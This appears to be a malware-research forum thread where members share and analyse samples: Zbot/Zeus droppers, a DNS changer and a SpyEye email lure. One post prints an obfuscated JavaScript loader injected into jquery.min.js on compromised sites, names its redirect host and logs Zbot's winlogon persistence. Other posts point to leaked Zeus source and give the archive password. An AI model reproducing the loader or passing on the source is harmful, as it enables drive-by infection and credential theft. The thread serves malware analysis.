[rossetoecioccolato]

> Ive found when using certain types of wireless via host and vm, this can also be a bad thing. <

I suppose that is only something that you get if somebody really likes you. :-| Would be interested though if there is anything that you can share. Did you look for rooted firmware in the SRAM of the wireless adapter?

[PX5]

Actually....I havent a clue but any tdss\tdl dns changer would do the trick I assume, the host was XP SP3 and I was using VBox but its been atleast a year ago when it happened, DNS Settings for both host and guest were tainted.

Thats about it, I did feel special for the moment, as in Short Bus Special but the moment passed quickly. ;)

[rossetoecioccolato]

> DNS Settings for both host and guest were tainted.<

Sorry, I misread your previous post. You were referring to a wireless router and I was thinking of a certain wireless network adapter. Virtually any hardware that is shared between the guest and host can lead to migration from guest to host partition. Thanks for sharing your experience.

[markusg]

zbot

[markusg]

javawin.exe
http://www.virustotal.com/file-scan/rep ... 1297346045

[gjf]

Some new story. Some Russian sites presents to the user some js in jquery.min.js.
This code redirects to host hxxp://bul0va.com/index.php?tp=f67f75493a6182fa with html which uses Java applet with unique "pid" parameter to perform decoding in the following part of embedded js:

Code: Select all

var vrq = null;var mgi = document.styleSheets[0].rules || document.styleSheets[0].cssRules;for(var dcwes = 0; dcwes < mgi.length; dcwes++) {var ztffs = mgi.item ? mgi.item(dcwes) : mgi[dcwes];roz=(ztffs.cssText) ? ztffs.cssText : ztffs.style.cssText;vrq = roz.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];};var s = "";var g = function(){return this;}();dtvu = g["e"+vrq.substr(0,2)+"l"];clrn = document.getElementsByTagName("textarea")[9-9].value.split(",");hqon=dtvu(vrq.substr(2));for (var i = 0; i < clrn.length; i++) {bzmwy = 9501 - 1*clrn[i];s += hqon(bzmwy);}dtvu(s);

where "textarea" - some data in js.

After that depending on OS version nix-systems are forwarded to Google and Win systems receives a dropper in %temp% which starts after that

This file has low detect and packed with UPX:

Code: Select all

UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo [Overlay]

There is another prot under UPX:

Code: Select all

AHTeam EP Protector 0.3 (fake PCGuard 4.03-4.15) -> FEUERRADER [Overlay] *

but the version is fake - the prot is modified slightly

The file is typical Zbot, maybe new, maybe old but repacked:

Code: Select all

Executing: d:\mxmt-upx.exe
...
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [d:\mxmt-upx.exe]
CreateMutex(_AVIRA_21099) [d:\mxmt-upx.exe]
...
RegCreateKeyEx(HKLM\software\microsoft\windows nt\currentversion\winlogon,(null)) [d:\mxmt-upx.exe]
RegSetValueEx(HKLM\software\microsoft\windows nt\currentversion\winlogon\userinit, REG_SZ: C:\WINDOWS\System32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,) [d:\mxmt-upx.exe]
DeleteFile(C:\WINDOWS\system32\sdra64.exe) [d:\mxmt-upx.exe]
Copy(D:\mxmt-UPX.exe->C:\WINDOWS\system32\sdra64.exe) [d:\mxmt-upx.exe]

Anubis logs, CWSandbox logs.

Original dropper is attached, the pasword is infected.

[gjf]

Just because this sources has leaked from closed mailings to public I can give a link here too :)
Sources are as old as 2.0.8.9.
For everybody who is interested.

[Fabian Wosar]

The password is "zeus" by the way ;).

[Flamef]

So,i was browsing a forum and suddenly a message arrived at my box>Subject " Amy Winehouse moments before death "
A file was attached,it was password protected,it's a new trick a guess,since i saw a warning"The file update socking video footage realleased of Amy Winehouse moments before death.zip is password protected and cannot be scanned for viruses.
Some pictures of the interesting infected file>





Virus total scan > http://www.virustotal.com/file-scan/rep ... 1312027915
4/43

McAfee 5.400.0.1158 2011.07.30 PWS-Spyeye.bx

I don't know if this is the right place to attach the sample,if you need the sample to analyze it etc,hit me a pm or post here.

[EP_X0FF]

Please attach it here in password protected archive.